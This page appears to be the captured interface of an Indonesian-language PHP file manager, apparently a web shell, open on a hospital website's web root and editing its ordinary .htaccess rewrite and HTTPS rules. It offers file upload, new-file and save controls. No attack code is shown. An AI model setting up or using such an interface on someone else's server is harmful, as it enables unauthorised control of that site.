CURRENT PATH:
/
home
/
u921493091
/
domains
/
shantidoothospital.com
/
public_html
/
[ ⬅ KEMBALI ]
|
[ HOME ]
Upload File:
Upload Ke Sini
Dir Baru
File Baru
Editing:
.htaccess
<IfModule mod_rewrite.c> # That was ONLY to protect you from 500 errors # if your server did not have mod_rewrite enabled RewriteEngine On # RewriteBase / # NOT needed unless you're using mod_alias to redirect RewriteCond %{REQUEST_URI} !/public RewriteRule ^(.*)$ public/$1 [L] # Direct all requests to /public folder </IfModule> RewriteCond %{HTTPS} off RewriteCond %{HTTP:X-Forwarded-SSL} !on RewriteCond %{HTTP_HOST} ^shantidoothospital\.com$ [OR] RewriteCond %{HTTP_HOST} ^www\.shantidoothospital\.com$ RewriteRule ^(.*)$ "https\:\/\/shantidoothospital\.com\/$1" [R=301,L] # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php83” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php83___lsphp .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit
SIMPAN
[ BATAL ]